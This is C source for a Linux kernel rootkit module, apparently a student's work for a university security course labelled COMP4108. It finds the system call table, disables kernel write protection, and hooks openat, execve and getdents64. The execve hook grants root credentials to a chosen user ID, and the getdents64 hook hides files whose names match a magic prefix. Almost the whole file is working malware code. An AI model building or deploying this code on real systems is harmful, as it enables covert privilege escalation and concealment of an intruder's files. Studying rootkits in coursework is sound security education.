/*
 * COMP4108 Rootkit Framework
*/

/*

* Edits made by Liam Collins, 101220637

*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>

#ifndef __NR_getdents
#define __NR_getdents 141
#endif
#define MODULE_NAME "rootkit"

// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function
static t_syscall original_execve; // create a variable to store the original execve function
static t_syscall original_getdents64; // create a variable to store the original getdents function

static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

static int root_uid;
module_param(root_uid, int, 1);
MODULE_PARM_DESC(root_uid, "The inputted value of the root_uid");

static char* magic_prefix;
module_param(magic_prefix, charp, 0);
MODULE_PARM_DESC(magic_prefix, "Received magic_prefix parameter");

static char* magic_prefix;

unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}


/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }
  kfree(filename);
  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}



asmlinkage int new_execve(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  // The di section of regs represents the first argument, where the path variable is inputted for execve
  if (strncpy_from_user(filename, (void*) regs->di, 4096) < 0){
    kfree(filename);
    return 0;
  }
  printk(KERN_INFO "execve() called for %s\n", filename);
  printk(KERN_INFO "Effective UID %u\n", current_euid());

  // Whenever the current set root_uid is detected as the euid calling execve, the user is given root privileges
  if (root_uid == current_euid().val){
      commit_creds(prepare_kernel_cred(0));
  }

  kfree(filename);

  // Invoke the original execve syscall
  ret = original_execve(regs);

  return ret;
}


asmlinkage int new_getdents64(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  struct linux_dirent64 *dirp = regs->si;
  
  //Call the original getdents64()syscall with the dirp buffer the hook recieves to have it populated with dirent
  ret = original_getdents64(regs);

  //Set to (ret > 72) for less log spam while testing
  //Ignores calls that have a dirent value of 0 (They wouldn'y have any contents)
  if (ret > 0 ){

    //Set up a temp buffer to hold the current dirent buffer
    struct linux_dirent64 *cur;

    //Set up an offset value that will determine the current position in the dirent buffer
    unsigned long offset = 0;
    //A variable tracking the number of bytes we will write back by the end of the program
    unsigned long bytesWritten = 0;
    //Allocate cur so that it retains information written to it
    cur = kmalloc(32768, GFP_KERNEL);

    // Since dirp is a buffer of dirents, we will need to iterate
    // All entries are assumed to be read once the offset exceed the size of ret
    while (offset < ret){
      
      //Add the offset to the dirp entry, moving us to the next object if (offset > 0)
      dirp = regs->si+offset;

      //Read the current dirent into the cur value
      if (copy_from_user(cur, dirp, 32768) < 0){
        kfree(cur);
        return ret;
      }


      //Print this dirent's filename
      printk(KERN_INFO "Entry: %s\n", cur->d_name);

      // Check if the entry matches the magic prefix
      if (strstr(cur->d_name, magic_prefix) != NULL) {
          printk(KERN_INFO "Entry hidden!");
          // Since the entry matches, we increment without updating moving the dirent back to userspace, effectively removing it.
          offset += cur->d_reclen;
          continue;
      }

      // Copy the current entry to userspace.
      // Any entries not written are "skipped"
      if (copy_to_user(regs->si + bytesWritten, cur, cur->d_reclen) < 0) {
          kfree(cur);
          return ret; 
      }

      //Alternate offset that keeps track of the "perceived" dirp length
      bytesWritten += cur->d_reclen;
      //increment offset by d_reclen, which is exactly how long the current dirent entry is (skipping it in subsequent loops)
      offset += cur->d_reclen;
    }
        // Free allocated memory
        kfree(cur);
        
        // Update ret to match the altered input size
        ret = bytesWritten;
  }
  
  
  return ret;
}
/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  // Let's store the original functions so they can be restored later
  original_openat = (t_syscall)__sys_call_table[__NR_openat];
  original_execve = (t_syscall)__sys_call_table[__NR_execve];
  original_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64];


  unprotect_memory();

  // Let's hook openat() for an example of how to use the framework
  __sys_call_table[__NR_openat] = (unsigned long) new_openat;
  __sys_call_table[__NR_execve] = (unsigned long) new_execve;
  __sys_call_table[__NR_getdents64] = (unsigned long) new_getdents64;


  // Let's hook execve() for privilege excalation
  // Let's hook getdents() to hide our files

  protect_memory();

  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");


  unprotect_memory();


  __sys_call_table[__NR_openat] = (unsigned long)original_openat;
  __sys_call_table[__NR_execve] = (unsigned long)original_execve;
  __sys_call_table[__NR_getdents64] = (unsigned long)original_getdents64;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents functions
  */

  // Let's unhook and restore the original execve() function
  // Let's unhook and restore the original getdents() function

  protect_memory();

  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");